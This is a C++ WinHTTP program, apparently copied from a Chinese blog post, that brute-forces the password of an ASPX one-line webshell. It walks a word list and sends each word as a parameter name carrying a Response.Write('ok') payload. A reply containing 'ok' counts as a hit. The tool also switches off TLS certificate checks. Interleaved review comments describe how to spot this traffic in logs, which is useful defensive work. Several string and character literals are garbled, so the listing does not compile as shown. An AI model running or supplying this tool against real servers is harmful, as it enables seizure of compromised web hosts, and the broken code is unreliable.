  • ASPX一句话爆破工具

    #include "stdafx.h"
    #include <stdio.h>
    #include <Windows.h>
    #include <stdlib.h>
    #include <string.h>
    #include <string>
    #include <winhttp.h>
    #pragma comment(lib,"winhttp.lib")
    
    /*
     * Prints the two-line program banner to stdout.
     *
     * NOTE(review): the string literal below spans raw line breaks, so the
     * listing does not compile as shown. This looks like extraction damage in
     * which "\n" escapes were turned into real newlines -- confirm against the
     * original post.
     */
    void banner() // print the banner
    {
    	printf("[-]:Webshell Aspx crack T00ls
    [-]:Welcome www.90sec.org
    ");
    }
    
    /*
     * Entry point. Usage, per the help text below: <exe> Host Domain_Url Password_List
     *
     * For every line of the file named by argv[3], the loop opens a WinHTTP
     * session, sends one HTTPS GET to Host (argv[1]) whose path is Url (argv[2])
     * followed by ?<line>=Response.Write("ok");Response.End(), and reports a
     * match when the bytes read from the response body contain "ok".
     *
     * What this traffic looks like from the server side, as far as the code shows:
     *  - User-Agent "HttpClient 1.0" (the agent string passed to WinHttpOpen);
     *  - TLS on port 443, one GET per word-list line, all to the same path;
     *  - each request carries a single query parameter whose NAME changes from
     *    request to request while the VALUE stays constant and contains
     *    Response.Write / Response.End.
     * A web-server log query or WAF rule keyed on that constant value, or on
     * many distinct parameter names hitting one path, would surface it.
     *
     * Always returns 0, including on every error path.
     *
     * NOTE(review): several string literals in this listing span raw line
     * breaks, which looks like extraction damage ("\n" escapes turned into real
     * newlines); the code does not compile as shown.
     * NOTE(review): inside the loop the WinHTTP handles and the `res` buffer are
     * never released on the normal path; only the last pszOutBuffer is deleted.
     */
    int _tmain(int argc, _TCHAR * argv [])
    {
    	DWORD dwsize = 0; // header length (lower-case s); distinct from dwSize declared in the loop
    	LPSTR pszOutBuffer;
    	LPBYTE lpHeader, lpData;
    	// NOTE(review): argv[1] and argv[2] are read here, before the argc < 4 check below.
    	LPCWSTR Host = argv[1];
    	LPCWSTR Url = argv[2];
    	char buf[MAX_PATH] = {0}; // line buffer filled by fgets
    	FILE* fp;
    	int i = 0;
    
    	if (argc < 4) // fewer than three arguments after the program name: print usage and stop
    	{
    		banner();
    		printf("[-]:%S Host Domain_Url Password_List
    ",argv[0]);
    		return 0;
    	}
    
    	if ((fp = _wfopen(argv[3],L"rb")) == NULL) // open the word list; NULL means it could not be opened
    	{
    		printf("File not found
    "); // report the error
    		return 0;
    	}
    	while ((fgets(buf,MAX_PATH,fp))) // note: fgets keeps the line ending in the buffer -- the author was stuck on this for an evening
    	{
    		// NOTE(review): '' is not a valid character literal; presumably '\0' before
    		// extraction. The index assumes every line ends in a two-byte CR LF; for a
    		// line shorter than two characters strlen(buf) - 2 wraps around and the
    		// store lands outside buf.
    		buf[strlen(buf) - 2] = ''; // overwrite the second-to-last character, i.e. the carriage return
    
    	HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", // create the WinHTTP session; the first argument is the User-Agent string
    		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
    		WINHTTP_NO_PROXY_NAME,
    		WINHTTP_NO_PROXY_BYPASS,0);
    	if (Hinternet == NULL) // session creation failed
    	{
    		printf("Failed to Initialize http sessions
    ");
    		return 0;
    	}
    
    	HINTERNET Hconnect = WinHttpConnect(Hinternet, // set up the connection
    		Host, // target host name
    		INTERNET_DEFAULT_HTTPS_PORT,// default HTTPS port, 443
    		0);
    
    	if (Hconnect == NULL) // on failure, close the WinHTTP session handle
    	{
    		printf("Hconnect error
    ");
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	// NOTE(review): the quotes around ok are unescaped as shown, presumably \"ok\"
    	// before extraction. res holds MAX_PATH + 1 wide characters and the length of
    	// Url is never checked before formatting into it.
    	WCHAR* res = new WCHAR[MAX_PATH + 1]; // allocate the buffer for the request path (the original comment said "release")
    	wsprintf(res,L"%s?%S=Response.Write("ok");Response.End()",Url,buf); // format path + query: the word-list line is the parameter name
    	HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, // build the request handle
    		L"GET",
    		res,
    		L"HTTP /1.1",
    		WINHTTP_NO_REFERER,
    		WINHTTP_DEFAULT_ACCEPT_TYPES,
    		WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);
    
    	if (Hrequest == NULL) 
    	{
    		WinHttpCloseHandle(Hinternet);
    		WinHttpCloseHandle(Hconnect);
    		return 0;
    	}
    
    	DWORD dwFlags;
    	DWORD dwBuffLen = sizeof(dwFlags);           
    	WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, // read the current security flags
    		(LPVOID)&dwFlags, &dwBuffLen);
    	// These four flags tell WinHTTP to ignore an unknown CA, an invalid
    	// certificate date, a host-name (CN) mismatch and a wrong-usage certificate,
    	// so the server certificate is effectively not validated for this request.
    	dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
    
    	WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, // apply the relaxed flags to this request
    		&dwFlags, sizeof (dwFlags) );
    
    	if (WinHttpSendRequest(Hrequest, // send the request: no extra headers, no body
    		WINHTTP_NO_ADDITIONAL_HEADERS,0,
    		WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)
    	{
    		DWORD err  = GetLastError();
    		WinHttpCloseHandle(Hrequest);
    		WinHttpCloseHandle(Hconnect);
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) // wait for the response
    	{
    		DWORD err = GetLastError();
    		WinHttpCloseHandle(Hrequest);
    		WinHttpCloseHandle(Hconnect);
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	DWORD dwSize = 0;
    	if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) // ask how many body bytes are available
    		printf( "Error %u in WinHttpQueryDataAvailable.
    ",
    		GetLastError());
    
    	WinHttpQueryHeaders(Hrequest, // first call, NULL buffer: obtains the required size in dwsize
    		WINHTTP_QUERY_RAW_HEADERS_CRLF,
    		WINHTTP_HEADER_NAME_BY_INDEX,NULL,
    		&dwsize,WINHTTP_NO_HEADER_INDEX);
    	lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);
    
    	// Second call fills lpHeader with the raw response headers; the buffer is
    	// freed on the next statement and nothing in this listing inspects it.
    	WinHttpQueryHeaders(Hrequest, 
    		WINHTTP_QUERY_RAW_HEADERS_CRLF, 
    		WINHTTP_HEADER_NAME_BY_INDEX, 
    		lpHeader, &dwsize, 
    		WINHTTP_NO_HEADER_INDEX);
    	HeapFree(GetProcessHeap(), 0, lpHeader);
    	DWORD dwDownloaded = 0;
    	pszOutBuffer = new char[dwSize+1];
    	// NOTE(review): this branch only prints; execution continues into
    	// ZeroMemory with the same pointer.
    	if (!pszOutBuffer)
    	{
    		printf("Out of memory
    ");
    	}
    
    	ZeroMemory(pszOutBuffer, dwSize+1); 
    	if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer, 
    		dwSize, &dwDownloaded))
    	{                                  
    		printf( "Error %u in WinHttpReadData.
    ", GetLastError());
    	}
    	// A hit is any occurrence of "ok" in the bytes just read; on a hit the
    	// function returns immediately, otherwise the loop moves to the next line.
    	if (strstr(pszOutBuffer,"ok"))
    	{
    		printf("Line:%d-->Find password Success:%s
    ",++i,buf);
    		return 0;
    	}else
    	{
    		printf("Line:%d-->password Not found:%s
    ",++i,buf);
    	}
    } // end of the per-line while loop
    	delete[] pszOutBuffer;
    	//delete[] res;
    	return 0;
    }
    
  • 原文地址:https://www.cnblogs.com/killbit/p/4237808.html